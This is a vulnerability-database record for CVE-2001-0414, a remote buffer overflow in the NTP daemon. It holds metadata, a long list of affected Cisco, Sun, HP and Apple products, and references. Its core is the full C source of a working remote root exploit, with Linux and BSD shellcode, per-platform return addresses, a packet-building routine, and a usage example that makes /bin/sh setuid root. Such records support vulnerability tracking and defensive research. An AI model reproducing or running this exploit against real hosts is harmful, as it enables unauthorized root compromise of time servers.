ID

VAR-E-200104-0050


CVE

cve_id:CVE-2001-0414

Trust: 2.4

sources: BID: 2540 // PACKETSTORM: 82268 // EXPLOIT-DB: 20727 // EDBNET: 42860

EDB ID

20727


TITLE

NTPd - Remote Buffer Overflow - Linux remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 20727

DESCRIPTION

NTPd - Remote Buffer Overflow. CVE-2001-0414CVE-805 . remote exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 20727

AFFECTED PRODUCTS

vendor:ntpdmodel: - scope: - version: -

Trust: 1.5

vendor:ciscomodel:ios 12.0 w5scope: - version: -

Trust: 0.9

vendor:ciscomodel:ios 12.2xqscope: - version: -

Trust: 0.6

vendor:ciscomodel:ios 12.0 xkscope: - version: -

Trust: 0.6

vendor:sunmodel:solaris 8 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 8 sparcscope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 7.0 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solarisscope:eqversion:7.0

Trust: 0.3

vendor:sunmodel:solaris 2.6 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solarisscope:eqversion:2.6

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:11.0.4

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:10.24

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:11.11

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:11.0

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:10.20

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:10.10

Trust: 0.3

vendor:hpmodel:hp-uxscope:eqversion:10.01

Trust: 0.3

vendor:davemodel:mills xntp3 escope:eqversion:5.93

Trust: 0.3

vendor:davemodel:mills xntp3 dscope:eqversion:5.93

Trust: 0.3

vendor:davemodel:mills xntp3 cscope:eqversion:5.93

Trust: 0.3

vendor:davemodel:mills xntp3 bscope:eqversion:5.93

Trust: 0.3

vendor:davemodel:mills xntp3 ascope:eqversion:5.93

Trust: 0.3

vendor:davemodel:mills xntp3scope:eqversion:5.93

Trust: 0.3

vendor:davemodel:mills ntpd kscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd jscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd iscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd hscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd gscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd fscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd escope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd dscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd cscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd bscope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpd ascope:eqversion:4.0.99

Trust: 0.3

vendor:davemodel:mills ntpdscope:eqversion:4.0.99

Trust: 0.3

vendor:ciscomodel:voice services provisioning toolscope: - version: -

Trust: 0.3

vendor:ciscomodel:virtual switch controllerscope:eqversion:3000

Trust: 0.3

vendor:ciscomodel:sc2200scope: - version: -

Trust: 0.3

vendor:ciscomodel:pgw2200 pstn gatewayscope: - version: -

Trust: 0.3

vendor:ciscomodel:ip managerscope:eqversion:2.0

Trust: 0.3

vendor:ciscomodel:ip managerscope:eqversion:1.0

Trust: 0.3

vendor:ciscomodel:ios 12.2ycscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2yascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xhscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xescope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xdscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2sscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2piscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2pbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2dascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2bxscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2bwscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2bscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.2

Trust: 0.3

vendor:ciscomodel:ios 12.1yfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ydscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ycscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ybscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1yascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xzscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xyscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.1xx

Trust: 0.3

vendor:ciscomodel:ios 12.1xwscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.1xv

Trust: 0.3

vendor:ciscomodel:ios 12.1xuscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xtscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xsscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xrscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xqscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xpscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xmscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xlscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xkscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xjscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xiscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xhscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xgscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xescope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xdscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ezscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1eyscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1exscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ecscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1escope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1dcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1dbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1dascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1cxscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1aascope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.1

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0xv

Trust: 0.3

vendor:ciscomodel:ios 12.0xuscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xsscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xrscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xqscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xpscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xnscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xmscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xlscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xjscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xiscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xhscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xgscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xescope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xdscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0wtscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0wcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0stscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0slscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0scscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0sscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0dcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0dbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0dascope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0

Trust: 0.3

vendor:ciscomodel:ios 11.3xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3wa4scope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3nascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3mascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3hascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3dbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3dascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.3aascope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.3

Trust: 0.3

vendor:ciscomodel:ios 11.2xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.2wa4scope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.2sascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.2pscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.2gsscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.2fscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.2bcscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.2

Trust: 0.3

vendor:ciscomodel:ios 11.1iascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.1ctscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.1ccscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.1cascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 11.1aascope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.1

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.0

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:10.3

Trust: 0.3

vendor:ciscomodel:btsscope:eqversion:10200

Trust: 0.3

vendor:ciscomodel:billing and management serverscope: - version: -

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.0.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.0

Trust: 0.3

vendor:ciscomodel:ios 12.2ddscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 tscope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.2(4)

Trust: 0.3

vendor:ciscomodel:ios 12.2 bpscope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.2(3)

Trust: 0.3

vendor:ciscomodel:ios 12.2 xa1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xascope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 bscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 sscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 piscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xqscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xhscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xescope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xd1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 aascope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.1(9)

Trust: 0.3

vendor:ciscomodel:ios 12.1 escope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 ecscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 cxscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 ez2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 eyscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yf2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yd2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yc1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yb4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.1(5)xv3

Trust: 0.3

vendor:ciscomodel:ios 12.1 xs2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xm4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 t9scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xf4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.0wcscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 yb4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 wc2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 st1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 sl2scope:neversion: -

Trust: 0.3

vendor:applemodel:mac osscope:neversion:x10.0.2

Trust: 0.3

sources: BID: 2540 // PACKETSTORM: 82268 // EXPLOIT-DB: 20727

EXPLOIT

// source: https://www.securityfocus.com/bid/2540/info

NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'.

On UNIX systems, the 'ntpd' daemon is available to regularly synchronize system time with internet time servers.

Many versions of 'ntpd' are prone to a remotely exploitable buffer-overflow issue. A remote attacker may be able to crash the daemon or execute arbitrary code on the host.

If successful, the attacker may gain root access on the victim host or may denial NTP service on the affected host.

/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is running
* with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
*
* Althought it's a normal buffer overflow, exploiting it is much harder.
* Destination buffer is accidentally damaged, when attack is performed, so
* shellcode can't be larger than approx. 70 bytes. This proof of concept code
* uses small execve() shellcode to run /tmp/sh binary. Full remote attack
* is possible.
*
* NTP is stateless UDP based protocol, so all malicious queries can be
* spoofed.
*
* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>

#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512

static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";

/* generic execve() shellcodes */

char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";

char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};

/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/

struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },

{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },

{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },

{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};

long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;

if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}

return ip;
}

int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */

char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };

char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };

char buf[PKTSIZ], *p;
long *ap;
int i;

int sockfd;
struct sockaddr_in sa;

bzero(&sa, sizeof(sa));

sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);

if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}

if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}

memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));

p = buf + align;
ap = (unsigned long *)p;

for(i=0;i<ADDRS/4;i++)
*ap++ = ret;

p = (char *)ap;

memcpy(buf+shalign, shellcode, strlen(shellcode));

if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}

fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);

if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}

fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);

close(sockfd);

return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;

opterr = ofs = 0;
type = -1;

while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;

case 'o':
ofs = atoi(optarg);
break;

case '?':
default:
puts(usage);
exit(0);

}

argc -= optind;
argv += optind;

fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");

if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}

exit(0);
}

fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);

ret = targ[type].ret;
ret += ofs;

if (argc != 1)
{
puts(usage);
exit(0);
}

fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);

if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}

fprintf(stderr, "Done.\n");

if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}

exit(0);
}

Trust: 1.0

sources: EXPLOIT-DB: 20727

EXPLOIT LANGUAGE

c

Trust: 0.6

sources: EXPLOIT-DB: 20727

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 20727

TYPE

Remote Buffer Overflow

Trust: 1.0

sources: EXPLOIT-DB: 20727

TAGS

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 82268

CREDITS

babcia padlina ltd

Trust: 0.6

sources: EXPLOIT-DB: 20727

EXTERNAL IDS

db:NVDid:CVE-2001-0414

Trust: 2.4

db:EXPLOIT-DBid:20727

Trust: 1.9

db:BIDid:2540

Trust: 1.9

db:EDBNETid:42860

Trust: 0.6

db:CERT/CCid:VU#970472

Trust: 0.5

db:PACKETSTORMid:82268

Trust: 0.5

sources: BID: 2540 // PACKETSTORM: 82268 // EXPLOIT-DB: 20727 // EDBNET: 42860

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2001-0414

Trust: 2.1

url:https://www.securityfocus.com/bid/2540/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/20727/

Trust: 0.6

url:http://www.cisco.com/warp/public/707/ntp-pub.shtml

Trust: 0.3

url:http://support.coresecurity.com/impact/exploits/1d0617f506101c3c4db122dc40236f69.html

Trust: 0.3

url:https://www.exploit-db.com/exploits/20727

Trust: 0.3

url:http://www.ntp.org

Trust: 0.3

sources: BID: 2540 // PACKETSTORM: 82268 // EXPLOIT-DB: 20727 // EDBNET: 42860

SOURCES

db:BIDid:2540
db:PACKETSTORMid:82268
db:EXPLOIT-DBid:20727
db:EDBNETid:42860

LAST UPDATE DATE

2022-07-27T09:21:00.633000+00:00


SOURCES UPDATE DATE

db:BIDid:2540date:2007-11-05T17:05:00

SOURCES RELEASE DATE

db:BIDid:2540date:2001-04-04T00:00:00
db:PACKETSTORMid:82268date:2009-10-27T21:30:47
db:EXPLOIT-DBid:20727date:2001-04-04T00:00:00
db:EDBNETid:42860date:2001-04-04T00:00:00